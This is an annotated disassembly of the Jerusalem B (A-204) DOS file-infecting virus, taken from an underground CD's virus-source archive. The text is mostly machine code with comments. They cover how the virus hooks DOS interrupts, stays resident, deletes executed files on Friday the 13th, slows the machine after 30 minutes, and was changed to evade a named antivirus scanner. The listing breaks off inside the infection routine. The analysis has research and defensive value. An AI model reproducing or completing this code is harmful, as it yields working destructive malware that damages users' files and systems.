home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / virii / zrodla / j / jerub204.asm < prev    next >
Encoding:
Assembly Source File  |  1998-01-14  |  41.0 KB  |  977 lines
  1.           Virus : Jerusalem Version B Variant A-204
  2. Disassembled by : Righard Zwienenberg
  3.                   Steenwijklaan 302
  4.                   2541 RT  The Hague
  5.                   The Netherlands
  6.                   Data  : +31-70-3898822, V22,V22b,HST,MNP,CM
  7.                   Voive : +31-70-3675379
  8. FidoNet address : 2:512/2.3
  9.   Used Software : ASMGEN, DEBUG and D86-Disassembler
  10.            Date : 20 june 1990
  11.  
  12. Note : All Values are hex. If a value is followd by d (e.g. 30d) it means
  13. 30 decimal.
  14.  
  15. Note : This disassembly consists of two programs. The original program was
  16. a dummy file (20h bytes long) containing 1Fh times 90 RET and 01h time 
  17. C3 RET. 
  18.  
  19. 0100 E9 92 00                JMP 0195        ; JUMP -> 0195h
  20.  
  21. 0103 db 2A,41,2D,32,30,34,2A             ; *A-204* never used
  22.  
  23. 010A dw 00 01 ; Startaddress original program
  24. 010C dw 01 56 ; Startaddress-offset original program
  25. 010E db 00    ; Trigger for destruction (delete file)
  26.               ; Always zero, but if it is Friday the 13th and the year is
  27.               ; not equal 1987 this byte is set to one
  28. 010F dw 00 00 ; Storing place for original AX (read-only word)
  29. 0111 dw 20 00 ; Length of Original Program (0020h)
  30. 0113 dw A5 FE ; Storing place for original BX of INT 08h vector
  31. 0115 dw 00 F0 ; Storing place for original ES of INT 08h vector
  32. 0117 dw 60 14 ; Storing place for original BX of INT 21h vector
  33. 0119 dw 2B 02 ; Storing place for original ES of INT 21h vector
  34. 011B dw 56 05 ; Storing place for original BX of INT 24h vector
  35. 011D dw DE 0C ; Storing place for original ES of INT 24h vector
  36. 011F dw 40 7E ; Storing place for timer for 30 minutes trigger
  37.               ; By init. set to 7E90h
  38.  
  39.               ; The following words are never used by the virus. The are used
  40.               ; by a routine starting at 0398h which is executed when INT 21h
  41.               ; is called with AH=DEh. This never happens in the code.
  42. 0121 dw 00 00 ;
  43. 0123 dw 00 00 ; 
  44. 0125 dw 00 00 ; 
  45. 0127 dw 00 00 ; 
  46. 0129 dw 00 00 ; 
  47. 012B dw 00 00 ; 
  48. 012D dw 00 E8 ; 
  49. 012F dw 06 EC ; 
  50.  
  51. 0131 dw 91 16 ; Storing place for original ES
  52. 0133 dw 80 00 ; Storing place for BX. Never read again
  53.  
  54. 0135 00 00 00 80 00
  55.  
  56. 0139 dw 91 16 ; Storing place for original ES
  57.  
  58. 013B 5C 00
  59.  
  60. 013D dw 91 16 ; Storing place for original ES
  61.  
  62. 013F 6C 00 ;
  63.  
  64. 0141 dw 91 16 ; Temp. storing place for original ES
  65. 0143 dw 00 20 ; Temp. storing place for AX
  66. 0145 dw 0D 1F ; Temp. storing place for ES+10h
  67. 0147 dw 5F 21 ; Storing place for AX
  68. 0149 dw A1 16 ; Temp. storing place for ES+10h
  69. 014B dw 00 F0 ; Temp. storing place for AX
  70. 014D db 02    ; Temp. storing place for AL
  71. 014E db 00    ; COM/EXE indicator
  72.               ; 0 = EXE-File
  73.               ; 1 = COM-File
  74. 0151 dw 30 01 ; Temp. storing place for DX 
  75. 0153 dw 23 00 ; Temp. storing place for AX
  76.  
  77. 0155 20 01 
  78.  
  79. 0157 dw 4A 00 ; Read Only!!! The code only read this word to substract it
  80.               ; from AX
  81.  
  82. 0159 D4 06 D4 06
  83.  
  84. 015D dw 98 03 ; Temp. Storing place to store AX
  85. 015F dw 10 07 ; Probably startaddress of virus in mem
  86. 0161 dw 84 19 ; Never used!!! 1984h is stored here by the code
  87. 0163 dw C5 00 ; 00C5h is being read and put back later by the code
  88. 0165 dw 99 03 ; Temp. storing place for AX
  89.  
  90. 0167 1C 00 00 00 90 90 90 90 C3
  91.  
  92. 0170 dw 05 00 ; Storing place for file handle (BX)
  93. 0172 dw 20 00 ; Storing place for file attributes
  94.               ; bit 0 = read only
  95.               ; bit 1 = hidden file
  96.               ; bit 2 = system file
  97.               ; bit 3 = volume label
  98.               ; bit 4 = subdirectory
  99.               ; bit 5 = archive bit
  100.               ; bit 8 = shareable (Novell Network)
  101. 0174 dw D5 14 ; Storing place for file date (DX)
  102. 0176 dw 99 83 ; Storing place for file time (CX)
  103. 0178 dw 00 02 ; 0200h=512d Used as multiplier/divider
  104. 017A dw 10 00 ; 0001h=  1d Used as multiplier/divider
  105. 017C dw 20 3E ; Temp. storing place for AX
  106. 017E dw 00 00 ; Temp. storing place for DX
  107. 0180 dw B9 42 ; Storing place for DX of ASCIZ-Filename
  108. 0182 dw 1A 9B ; Storing place for DS of ASCIZ-Filename
  109.  
  110. 0184 db 43,4F,4D,4D,41,4E,44,2E,43,4F,4D ; COMMAND.COM
  111.                                          ; May not become infected
  112.  
  113. 018F dw 01 00 ; Storing place for variable-result of free-memory-scan
  114.               ; 0000h : not enough memory available 
  115.               ; 0001h : enough memory available
  116.  
  117. 0191 00 00 00 00 
  118.  
  119. 0195 FC                      CLD        ; Clear Direct
  120. 0196 B4 E0                   MOV AH,0E0        ; This is the check if the
  121. 0198 CD 21                   INT 021        ; virus is already active    
  122.                         ; in memory. INT 21h with
  123.                         ; AH=E0h will return AX=0300h
  124.                         ; if the virus is active.
  125. 019A 80 FC E0             CMP AH,0E0        ; AH>=E0h?
  126. 019D 73 16             JAE 01B5        ; Yes: -> 01B5h  
  127. 019F 80 FC 03             CMP AH,3        ; AH<-03h?
  128. 01A2 72 11             JB 01B5        ; Yes: -> 01B5h
  129.                         ; INT 21h with AH=
  130.                         ; DDh,DEh,E0h
  131.                         ; are self-defined.
  132.  
  133.                         ; SetUp for 
  134.                         ; Executing original program 
  135.                         ; We come here if an infected
  136.                         ; program is executed and the
  137.                         ; virus is already active in
  138.                         ; memory.
  139. 01A4 B4 DD                   MOV AH,0DD         ;
  140. 01A6 BF 00 01                MOV DI,0100    ; Destination Index = 0100h
  141. 01A9 BE 10 07                MOV SI,0710        ; Source Index = 0710h
  142. 01AC 03 F7                   ADD SI,DI        ; Source Index:= 0810h
  143.                         ; At this place the original
  144.                         ; Program is located
  145. 01AE 2E 8B 8D 11 00          CS MOV CX,W[DI+011]; CX=20h (length original
  146.                         ; Program)
  147. 01B3 CD 21                   INT 021        ; 
  148.  
  149.                         ; Here we come when the virus
  150.                         ; is not yet in memory
  151. 01B5 8C C8                   MOV AX,CS        ; AX=Code Segment 
  152. 01B7 05 10 00                ADD AX,010        ; AX:=AX+10h
  153. 01BA 8E D0                   MOV SS,AX        ; Stack Segment:=AX
  154. 01BC BC 00 07                MOV SP,0700    ; StackPointer = 0700h
  155. 01BF 50                      PUSH AX        ; Store AX
  156. 01C0 B8 C5 00                MOV AX,0C5        ; AX = C5h
  157. 01C3 50                      PUSH AX        ; Store AX
  158. 01C4 CB                      RETF        ; -> C5h
  159.  
  160. 01C5 FC                      CLD        ; Clear Direct
  161. 01C6 06                      PUSH ES        ; Store ES
  162. 01C7 2E 8C 06 31 00          CS MOV W[031],ES    ; Store ES 
  163. 01CC 2E 8C 06 39 00          CS MOV W[039],ES    ; in storage places
  164. 01D1 2E 8C 06 3D 00          CS MOV W[03D],ES    ;
  165. 01D6 2E 8C 06 41 00          CS MOV W[041],ES    ;
  166. 01DB 8C C0                   MOV AX,ES        ; AX=ES
  167. 01DD 05 10 00                ADD AX,010        ; AX=AX+10h
  168. 01E0 2E 01 06 49 00          CS ADD W[049],AX    ; Add AX (ES+10h) to 0149h
  169. 01E5 2E 01 06 45 00          CS ADD W[045],AX    ; and 0145h
  170. 01EA B4 E0                   MOV AH,0E0        ; AH=E0h (Self defined)
  171. 01EC CD 21                   INT 021        ; CALL INT 21h
  172.  
  173. 01EE 80 FC E0                CMP AH,0E0        ; AH>=0Eh?
  174. 01F1 73 13                   JAE 0206        ; Yes: -> 0206
  175. 01F3 80 FC 03                CMP AH,3        ; AH=03h? Must be if the
  176.                         ; viruscode is in memory
  177.                         ; and interrupt 21h is called
  178.                         ; with AH=E0h.
  179.  
  180. 01F6 07                      POP ES        ; Restore original ES
  181. 01F7 2E 8E 16 45 00          CS MOV SS,W[045]   ; SS=ES+10h
  182. 01FC 2E 8B 26 43 00          CS MOV SP,W[043]   ;
  183. 0201 2E FF 2E 47 00          CS JMP D[047]      ;
  184.  
  185. 0206 33 C0                   XOR AX,AX        ; AX=0000h
  186. 0208 8E C0                   MOV ES,AX        ; ES=0000h
  187. 020A 26 A1 FC 03             ES MOV AX,W[03FC]
  188.  
  189.                         ; Here the A-204 variant 
  190.                         ; differs for the first
  191.                         ; time from the original
  192.                         ; Jerusalem Version B virus.
  193. 020E 26 A0 FE 03             ES MOV AL,B[03FE]    ; These two line have been
  194. 0212 2E A3 4B 00             CS MOV W[04B],AX    ; changed in order
  195.                         ; to avoid being
  196.                         ; detected by ViruScan from
  197.                         ; John McAfee.
  198.  
  199. 0216 2E A2 4D 00             CS MOV B[04D],AL
  200. 021A 26 C7 06 FC 03 F3 A5    ES MOV W[03FC],0A5F3
  201. 0221 26 C6 06 FE 03 CB       ES MOV B[03FE],0CB
  202. 0227 58                      POP AX
  203. 0228 05 10 00                ADD AX,010
  204. 022B 8E C0                   MOV ES,AX
  205. 022D 0E                      PUSH CS        ; Store CS
  206. 022E 1F                      POP DS        ; DS=CS
  207. 022F B9 10 07                MOV CX,0710    ; CX=0710h
  208. 0232 D1 E9                   SHR CX,1        ; CX >> 1 (CX:=0308h)
  209. 0234 33 F6                   XOR SI,SI        ; SI=0000h
  210. 0236 8B FE                   MOV DI,SI        ; DI=0000h
  211. 0238 06                      PUSH ES        ; Store ES
  212. 0239 B8 42 01                MOV AX,0142    ; AX=0142h
  213. 023C 50                      PUSH AX        ; Store AX
  214. 023D EA FC 03 00 00          JMP 0:03FC
  215.  
  216. 0242 8C C8                   MOV AX,CS        ; AX=CS
  217. 0244 8E D0                   MOV SS,AX        ; SS=CS
  218. 0246 BC 00 07                MOV SP,0700    ; SP=0700h
  219. 0249 33 C0                   XOR AX,AX        ; AX=0000h
  220. 024B 8E D8                   MOV DS,AX        ; DS=0000h
  221. 024D 2E A1 4B 00             CS MOV AX,W[04B]    ; Restore AX
  222. 0251 A3 FC 03                MOV W[03FC],AX    ; Store AX
  223. 0254 2E A0 4D 00             CS MOV AL,B[04D]    ; Restore AL
  224. 0258 A2 FE 03                MOV B[03FE],AL    ; Store AL
  225. 025B 8B DC                   MOV BX,SP        ; BX=SP
  226. 025D B1 04                   MOV CL,4        ; CL=04h
  227. 025F D3 EB                   SHR BX,CL        ; BX >> 4
  228. 0261 83 C3 10                ADD BX,010        ; BX=BX+10h
  229. 0264 2E 89 1E 33 00          CS MOV W[033],BX    ; Store BX. Why I don't know,
  230.                         ; the storing place is never
  231.                         ; read again
  232. 0269 B4 4A                   MOV AH,04A        ; 
  233. 026B 2E 8E 06 31 00          CS MOV ES,W[031]    ; Restore ES
  234. 0270 CD 21                   INT 021        ; Adjust Memory Block Size
  235.                         ; (SETBLOCK)
  236.  
  237. 0272 B8 21 35                MOV AX,03521    ; Get original INT 21h
  238. 0275 CD 21                   INT 021        ; vector
  239.  
  240. 0277 2E 89 1E 17 00          CS MOV W[017],BX    ; Store BX and ES of INT 21h
  241. 027C 2E 8C 06 19 00          CS MOV W[019],ES    ; vector
  242. 0281 0E                      PUSH CS        ; Store CS
  243. 0282 1F                      POP DS        ; DS=CS
  244. 0283 BA 5B 02                MOV DX,025B    ; DX=025Bh
  245. 0286 B8 21 25                MOV AX,02521       ; Set new INT 21h
  246. 0289 CD 21                   INT 021        ; vector on DS:025Bh
  247.  
  248. 028B 8E 06 31 00             MOV ES,W[031]    ; Restore original ES
  249. 028F 26 8E 06 2C 00          ES MOV ES,W[02C]    ;
  250. 0294 33 FF                   XOR DI,DI        ; DI=0000h
  251. 0296 B9 FF 7F                MOV CX,07FFF    ; CX=7FFFh
  252. 0299 32 C0                   XOR AL,AL        ; AL=0000h
  253. 029B F2 AE                   REPNE SCASB    ; 
  254. 029D 26 38 05                ES CMP B[DI],AL    ;
  255. 02A0 E0 F9                   LOOPNE 029B    ; No Flags: DEC CX -> 02A2h
  256.                         ; IF CX<>0 and not equal
  257.                         ; -> 029B
  258. 02A2 8B D7                   MOV DX,DI        ; DX=DI
  259. 02A4 83 C2 03                ADD DX,3        ; DX=DX+03h
  260. 02A7 B8 00 4B                MOV AX,04B00    ; AX=4B00h
  261. 02AA 06                      PUSH ES        ; Store ES
  262. 02AB 1F                      POP DS        ; Restore DS (DS:=ES)
  263. 02AC 0E                      PUSH CS        ; Store CS
  264. 02AD 07                      POP ES        ; Restore ES (ES:=CS)
  265. 02AE BB 35 00                MOV BX,035        ; BX=35h
  266. 02B1 1E                      PUSH DS        ; Store Registers
  267. 02B2 06                      PUSH ES
  268. 02B3 50                      PUSH AX
  269. 02B4 53                      PUSH BX
  270. 02B5 51                      PUSH CX
  271. 02B6 52                      PUSH DX
  272.  
  273. 02B7 B4 2A                   MOV AH,02A     ; Get Current Date
  274. 02B9 CD 21                   INT 021        ; DL=day
  275.                         ; DH=month
  276.                         ; CX=year
  277.                         ; AL=Day of the week
  278.  
  279. 02BB 2E C6 06 0E 00 00       CS MOV B[0E],0    ; Set Trigger for deleting
  280.                         ; infected files to 00h
  281. 02C1 81 F9 C3 07             CMP CX,07C3    ; Is year 1987 ?
  282. 02C5 74 30                   JE 02F7        ; Yes: -> 02F7h
  283. 02C7 3C 05                   CMP AL,5        ; Is it Friday ?
  284. 02C9 75 0D                   JNE 02D8        ; No: -> 02D8h
  285. 02CB 80 FA 0D                CMP DL,0D        ; Is it 13th ?
  286. 02CE 75 08                   JNE 02D8        ; No: -> 02D8h
  287.                         ; Yes: it is Friday
  288.                         ; the 13th and the
  289.                         ; year is not equal 1987
  290. 02D0 2E FE 06 0E 00          CS INC B[0E]    ; Set Trigger for deleting
  291.                         ; infected files to 01h
  292. 02D5 EB 20                   JMP 02F7        ; JUMP -> 02F7h
  293.  
  294. 02D7 90                      NOP
  295.  
  296. 02D8 B8 08 35                MOV AX,03508    ; Get original INT 8h
  297. 02DB CD 21                   INT 021        ; vector
  298.  
  299. 02DD 2E 89 1E 13 00          CS MOV W[013],BX    ; Store original BX
  300. 02E2 2E 8C 06 15 00          CS MOV W[015],ES    ; and ES of INT 08h vector
  301. 02E7 0E                      PUSH CS
  302. 02E8 1F                      POP DS
  303. 02E9 C7 06 1F 00 90 7E       MOV W[01F],07E90    ; Store 30d minutes into
  304.                         ; timer interrupt. This
  305.                         ; value is decreased by
  306.                         ; one 18.2 times per second
  307. 02EF B8 08 25                MOV AX,02508    ; Set new INT 8h vector
  308. 02F2 BA 1E 02                MOV DX,021E    ; to DS:021Eh
  309. 02F5 CD 21                   INT 021        ; 
  310.  
  311. 02F7 5A                      POP DX        ; Restore Registers
  312. 02F8 59                      POP CX
  313. 02F9 5B                      POP BX
  314. 02FA 58                      POP AX
  315. 02FB 07                      POP ES
  316. 02FC 1F                      POP DS
  317. 02FD 9C                      PUSHF        ; Store Flags
  318. 02FE 2E FF 1E 17 00          CS CALL D[017]    ; Call original INT 21h
  319.                         ; address
  320.  
  321. 0303 1E                      PUSH DS        ; Restore DS
  322. 0304 07                      POP ES        ; Store ES
  323. 0305 B4 49                   MOV AH,049        ; Free Memory
  324. 0307 CD 21                   INT 021        ;
  325.  
  326. 0309 B4 4D                   MOV AH,04D        ; Get ExitCode of
  327. 030B CD 21                   INT 021        ; SubProgram (WAIT) 
  328.                         ; Stored in AL
  329.  
  330. 030D B4 31                   MOV AH,031        ; AX=31[AL]h
  331. 030F BA 00 06                MOV DX,0600    ; DX=600h
  332. 0312 B1 04                   MOV CL,4        ; CL=04h
  333. 0314 D3 EA                   SHR DX,CL        ; DX >> 4 (DX=60H)
  334. 0316 83 C2 10                ADD DX,010        ; DX=DX+10h (DX=70h)
  335.                         ; Program Size in Paragraphs
  336.                         ; is 70h Bytes
  337. 0319 CD 21                   INT 021        ; Terminate but Stay Resident
  338.  
  339. 031B 32 C0                   XOR AL,AL        ; Clear AL
  340. 031D CF                      IRET        ; Interrupt Return
  341.  
  342.                         ; 031Eh is the new INT 08h
  343.                         ; vector. This routine is
  344.                         ; called 18.2 times per
  345.                         ; second
  346. 031E 2E 83 3E 1F 00 02       CS CMP W[01F],2    ; Timer decreased til 02h?
  347. 0324 75 17                   JNE 033D        ; No: -> 033D
  348.     
  349.                         ; Yes: now 32 minutes are
  350.                         ; passed since infection
  351. 0326 50                      PUSH AX        ; Store Registers
  352. 0327 53                      PUSH BX
  353. 0328 51                      PUSH CX
  354. 0329 52                      PUSH DX
  355. 032A 55                      PUSH BP
  356.  
  357. 032B B8 02 06                MOV AX,0602    ; Scroll box with coordinates
  358. 032E B7 87                   MOV BH,087        ; (5h,5h),(10h,10h) two
  359. 0330 B9 05 05                MOV CX,0505    ; lines upwards
  360. 0333 BA 10 10                MOV DX,01010    ; 
  361. 0336 CD 10                   INT 010        ; 
  362.  
  363. 0338 5D                      POP BP        ; Restore Registers
  364. 0339 5A                      POP DX
  365. 033A 59                      POP CX
  366. 033B 5B                      POP BX
  367. 033C 58                      POP AX
  368. 033D 2E FF 0E 1F 00          CS DEC W[01F]    ; Decrease Timer-Trigger
  369.                         ; This now becomes 01h
  370. 0342 75 12                   JNE 0356        ; If 0: -> 0356h
  371. 0344 2E C7 06 1F 00 01 00    CS MOV W[01F],1    ; Timer-Trigger set to 01h
  372. 034B 50                      PUSH AX        ; Store AX
  373. 034C 51                      PUSH CX        ; Store CX
  374. 034D 56                      PUSH SI        ; Store SI
  375. 034E B9 01 40                MOV CX,04001    ; CX=4001h
  376. 0351 F3 AC                   REP LODSB        ; Load byte [SI] into AL and
  377.                         ; advance SI, done CX times.
  378.                         ; This is the routine which 
  379.                         ; decreases the speed of the
  380.                         ; machine til 1/5th of the
  381.                         ; original. 32 minutes after
  382.                         ; infection this routine is
  383.                         ; executes 18.2 times a second
  384. 0353 5E                      POP SI        ; Restore SI
  385. 0354 59                      POP CX        ; Restore CX
  386. 0355 58                      POP AX        ; Restore AX
  387. 0356 2E FF 2E 13 00          CS JMP D[013]    ; Jump to original INT 08h
  388.                         ; address
  389.  
  390.                         ; Here we come if INT 21h is 
  391.                         ; called
  392. 035B 9C                      PUSHF        ; Store Flags
  393. 035C 80 FC E0                CMP AH,0E0        ; AH=0Eh ?
  394. 035F 75 05                   JNE 0366        ; No: -> 0366h
  395. 0361 B8 00 03                MOV AX,0300    ; AX=0300h
  396. 0364 9D                      POPF        ; Restore Flags
  397. 0365 CF                      IRET        ; Interrupt Return
  398.  
  399. 0366 80 FC DD                CMP AH,0DD        ; AH=DDh?
  400. 0369 74 13                   JE 037E        ; Yes: -> 037Eh
  401. 036B 80 FC DE                CMP AH,0DE        ; AH=DEh?
  402. 036E 74 28                   JE 0398        ; Yes: -> 0398h
  403.                         ; INT 21h is never called
  404.                         ; with AH=DEh. So the routine
  405.                         ; at 0398h is never used
  406.                         ; (seems)
  407.  
  408. 0370 3D 00 4B                CMP AX,04B00    ; Load & Execute ? 
  409. 0373 75 03                   JNE 0378        ; No: -> 0378h
  410. 0375 E9 B4 00                JMP 042C        ; Yes: -> 042Ch
  411. 0378 9D                      POPF        ; Restore Flags
  412. 0379 2E FF 2E 17 00          CS JMP D[017]    ; Jmp to original
  413.                         ; INT 21h address
  414.  
  415.                         ; Execute original program
  416. 037E 58                      POP AX
  417. 037F 58                      POP AX        ; Restore AX
  418. 0380 B8 00 01                MOV AX,0100    ; AX=0100h
  419. 0383 2E A3 0A 00             CS MOV W[0A],AX    ; Store AX
  420. 0387 58                      POP AX        ; Restore AX
  421. 0388 2E A3 0C 00             CS MOV W[0C],AX    ; Store AX
  422. 038C F3 A4                   REP MOVSB        ;
  423. 038E 9D                      POPF        ; Restore Flags
  424. 038F 2E A1 0F 00             CS MOV AX,W[0F]    ; AX=0000h
  425. 0393 2E FF 2E 0A 00          CS JMP D[0A]    ; JUMP -> CS:0100h
  426.                         ; This executes the original
  427.                         ; program
  428.  
  429.  
  430.                         ; This routine is called
  431.                         ; when INT 21h with AH=DEh
  432.                         ; is called which never
  433.                         ; happens in the code. I
  434.                         ; have to investigate it 
  435.                         ; a bit more. Til then
  436.                         ; it remains without comments.
  437. 0398 83 C4 06                ADD SP,6
  438. 039B 9D                      POPF
  439. 039C 8C C8                   MOV AX,CS
  440. 039E 8E D0                   MOV SS,AX
  441. 03A0 BC 10 07                MOV SP,0710
  442. 03A3 06                      PUSH ES
  443. 03A4 06                      PUSH ES
  444. 03A5 33 FF                   XOR DI,DI    
  445. 03A7 0E                      PUSH CS
  446. 03A8 07                      POP ES
  447. 03A9 B9 10 00                MOV CX,010
  448. 03AC 8B F3                   MOV SI,BX
  449. 03AE BF 21 00                MOV DI,021
  450. 03B1 F3 A4                   REP MOVSB
  451. 03B3 8C D8                   MOV AX,DS
  452. 03B5 8E C0                   MOV ES,AX
  453. 03B7 2E F7 26 7A 00          CS MUL W[07A]
  454. 03BC 2E 03 06 2B 00          CS ADD AX,W[02B]
  455. 03C1 83 D2 00                ADC DX,0
  456. 03C4 2E F7 36 7A 00          CS DIV W[07A]
  457. 03C9 8E D8                   MOV DS,AX
  458. 03CB 8B F2                   MOV SI,DX
  459. 03CD 8B FA                   MOV DI,DX
  460. 03CF 8C C5                   MOV BP,ES
  461. 03D1 2E 8B 1E 2F 00          CS MOV BX,W[02F]
  462. 03D6 0B DB                   OR BX,BX
  463. 03D8 74 13                   JE 03ED
  464. 03DA B9 00 80                MOV CX,08000
  465. 03DD F3 A5                   REP MOVSW
  466. 03DF 05 00 10                ADD AX,01000
  467. 03E2 81 C5 00 10             ADD BP,01000
  468. 03E6 8E D8                   MOV DS,AX
  469. 03E8 8E C5                   MOV ES,BP
  470. 03EA 4B                      DEC BX
  471. 03EB 75 ED                   JNE 03DA
  472. 03ED 2E 8B 0E 2D 00          CS MOV CX,W[02D]
  473. 03F2 F3 A4                   REP MOVSB
  474. 03F4 58                      POP AX    
  475. 03F5 50                      PUSH AX    
  476. 03F6 05 10 00                ADD AX,010
  477. 03F9 2E 01 06 29 00          CS ADD W[029],AX
  478. 03FE 2E 01 06 25 00          CS ADD W[025],AX
  479. 0403 2E A1 21 00             CS MOV AX,W[021]
  480. 0407 1F                      POP DS    
  481. 0408 07                      POP ES    
  482. 0409 2E 8E 16 29 00          CS MOV SS,W[029]
  483. 040E 2E 8B 26 27 00          CS MOV SP,W[027]
  484. 0413 2E FF 2E 23 00          CS JMP D[023]
  485.  
  486.                              ; We come here if B[0Eh]=1,
  487.                         ; which means Friday 13th,
  488.                         ; year<>1987. This routine                        
  489.                         ; deletes the loaded file.
  490. 0418 33 C9                   XOR CX,CX        ; Clear all bits of the File
  491.                         ; Attribute
  492. 041A B8 01 43                MOV AX,04301    ; 
  493. 041D CD 21                   INT 021        ; Put File Atributes
  494.  
  495. 041F B4 41                   MOV AH,041        ;
  496. 0421 CD 21                   INT 021        ; Delete a File (Unlink)
  497.  
  498. 0423 B8 00 4B                MOV AX,04B00
  499.  
  500. 0426 9D                      POPF        ; Get Flags
  501. 0427 2E FF 2E 17 00          CS JMP D[017]
  502.  
  503.                         ; We come here each time a
  504.                         ; file is loaded with the
  505.                         ; load and execute call
  506.                         ; (INT 21h, AX=4B00h)
  507. 042C 2E 80 3E 0E 00 01       CS CMP B[0E],1     ; Is it Friday 13th,
  508.                         ; year<>1987?
  509. 0432 74 E4                   JE 0418        ; Yes: -> 0418h
  510. 0434 2E C7 06 70 00 FF FF    CS MOV W[070],-1    ; File Handle -1 ???
  511. 043B 2E C7 06 8F 00 00 00    CS MOV W[08F],0    ; Clear Memory-Available
  512.                         ; variable
  513. 0442 2E 89 16 80 00          CS MOV W[080],DX    ; DS:DX -> ASCIZ Filename,
  514. 0447 2E 8C 1E 82 00          CS MOV W[082],DS    ; Store DX and DS
  515. 044C 50                      PUSH AX
  516. 044D 53                      PUSH BX
  517. 044E 51                      PUSH CX
  518. 044F 52                      PUSH DX
  519. 0450 56                      PUSH SI
  520. 0451 57                      PUSH DI
  521. 0452 1E                      PUSH DS
  522. 0453 06                      PUSH ES
  523. 0454 FC                      CLD
  524. 0455 8B FA                   MOV DI,DX        ; 
  525. 0457 32 D2                   XOR DL,DL        ; DL=00h : Take Default Drive
  526. 0459 80 7D 01 3A             CMP B[DI+1],03A    ; ':' at 2nd place in ASCIZ-
  527.                         ; filename
  528. 045D 75 05                   JNE 0464        ; No: -> 0464h
  529. 045F 8A 15                   MOV DL,B[DI]    ; Get Drive Letter
  530. 0461 80 E2 1F                AND DL,01F        ; Get Drive Code
  531.                         ; 0 = Default
  532.                         ; 1 = A
  533.                         ; 2 = B, etc.
  534. 0464 B4 36                   MOV AH,036        ;
  535. 0466 CD 21                   INT 021        ; Get disk space
  536.                         ; BX=# of available clusters
  537.                         ; CX=Bytes per sector
  538.                         ; DX=Total clusters
  539.  
  540. 0468 3D FF FF                CMP AX,-1        ; No Sectors Free?
  541. 046B 75 03                   JNE 0470        ; No: -> 0470h
  542. 046D E9 77 02                JMP 06E7        ; Yes: -> 06E7h
  543.  
  544.  
  545. 0470 F7 E3                   MUL BX        ; Calculate Free Space
  546. 0472 F7 E1                   MUL CX        ;
  547. 0474 0B D2                   OR DX,DX        ;
  548. 0476 75 05                   JNE 047D        ; 
  549. 0478 3D 10 07                CMP AX,0710    ; 1808 Bytes Free?
  550. 047B 72 F0                   JB 046D        ; No: -> 046Dh
  551. 047D 2E 8B 16 80 00          CS MOV DX,W[080]    ; Restore DX's ASCIZ Filename
  552. 0482 1E                      PUSH DS
  553. 0483 07                      POP ES
  554. 0484 32 C0                   XOR AL,AL        ; AL=00h
  555. 0486 B9 41 00                MOV CX,041        ;
  556. 0489 F2 AE                   REPNE SCASB    ; Check if filename
  557. 048B 2E 8B 36 80 00          CS MOV SI,W[080]    ; is in UPPERCASE
  558. 0490 8A 04                   MOV AL,B[SI]    ;
  559. 0492 0A C0                   OR AL,AL        ; All UPPERRCASE?
  560. 0494 74 0E                   JE 04A4        ; IF so: -> 04A4h
  561. 0496 3C 61                   CMP AL,061        ; AL<'a' ?
  562. 0498 72 07                   JB 04A1        ; Yes: -> 04A1h
  563. 049A 3C 7A                   CMP AL,07A        ; AL>'z' ?
  564. 049C 77 03                   JA 04A1        ; Yes: -> 04A1h
  565. 049E 80 2C 20                SUB B[SI],020    ; Transfer filename
  566.                         ; into UPPERCASE
  567. 04A1 46                      INC SI        ; SI=SI+1
  568. 04A2 EB EC                   JMP 0490
  569.  
  570. 04A4 B9 0B 00                MOV CX,0B        ; CX=0Bh
  571. 04A7 2B F1                   SUB SI,CX        ; Return SI to start
  572.                         ; of Filename
  573. 04A9 BF 84 00                MOV DI,084        ; Start of COMMAND.COM 
  574.                         ; filename
  575. 04AC 0E                      PUSH CS
  576. 04AD 07                      POP ES
  577. 04AE B9 0B 00                MOV CX,0B
  578. 04B1 F3 A6                   REPE CMPSB        ; Filename=COMMAND.COM ?
  579. 04B3 75 03                   JNE 04B8        ; No: -> 04B8h
  580. 04B5 E9 2F 02                JMP 06E7        ; Yes: -> 06E7h
  581.  
  582.                         ; We come here if the 
  583.                         ; loaded program is not
  584.                         ; COMMAND.COM
  585. 04B8 B8 00 43                MOV AX,04300     ; 
  586. 04BB CD 21                   INT 021        ; Get File Attributes
  587.  
  588. 04BD 72 05                   JB 04C4        ; If Error: -> 04C4h
  589. 04BF 2E 89 0E 72 00          CS MOV W[072],CX    ; Store File Attributes
  590. 04C4 72 25                   JB 04EB        ; If Error: -> 04EBh
  591. 04C6 32 C0                   XOR AL,AL        ; AL=00h
  592. 04C8 2E A2 4E 00             CS MOV B[04E],AL    ; Dummy=0
  593. 04CC 1E                      PUSH DS        ;
  594. 04CD 07                      POP ES        ;
  595. 04CE 8B FA                   MOV DI,DX        ; 
  596. 04D0 B9 41 00                MOV CX,041        ;
  597. 04D3 F2 AE                   REPNE SCASB    ;
  598. 04D5 80 7D FE 4D             CMP B[DI-2],04D    ; "M" ?
  599. 04D9 74 0B                   JE 04E6        ; Yes: -> 04E6h
  600. 04DB 80 7D FE 6D             CMP B[DI-2],06D    ; "m" ?
  601. 04DF 74 05                   JE 04E6        ; Yes: -> 04E6h
  602. 04E1 2E FE 06 4E 00          CS INC B[04E]    ; Dummy=Dummy+1
  603. 04E6 B8 00 3D                MOV AX,03D00    ; Open Disk File with
  604. 04E9 CD 21                   INT 021        ; handle in compatibility
  605.                         ; mode
  606.                         ; DS:DX : -> ASCIZ Filename
  607.  
  608. 04EB 72 5A                   JB 0547        ; IF Error: -> 0547h
  609. 04ED 2E A3 70 00             CS MOV W[070],AX    ; Store File Handle
  610. 04F1 8B D8                   MOV BX,AX        ; BX=File Handle
  611. 04F3 B8 02 42                MOV AX,04202    ; Move File Read/Write
  612.                         ; Pointer (LSEEK) with
  613.                         ; offset from end of file
  614. 04F6 B9 FF FF                MOV CX,-1        ; CX:DX = offset in bytes
  615. 04F9 BA FB FF                MOV DX,-5        ; 
  616. 04FC CD 21                   INT 021        ;
  617.                         ; DX:AX = new absolute
  618.                         ; offset from beginning of
  619.                         ; file
  620.  
  621. 04FE 72 EB                   JB 04EB        ; If Error: -> 04EBh
  622. 0500 05 05 00                ADD AX,5        ; ????
  623. 0503 2E A3 11 00             CS MOV W[011],AX    ; Store Length of File
  624.  
  625. 0507 B9 05 00                MOV CX,5        ; Read from a file with
  626. 050A BA 6B 00                MOV DX,06B        ; handle BX 5h bytes into
  627. 050D 8C C8                   MOV AX,CS        ; DS:DX buffer
  628. 050F 8E D8                   MOV DS,AX        ;
  629. 0511 8E C0                   MOV ES,AX        ;
  630. 0513 B4 3F                   MOV AH,03F        ;
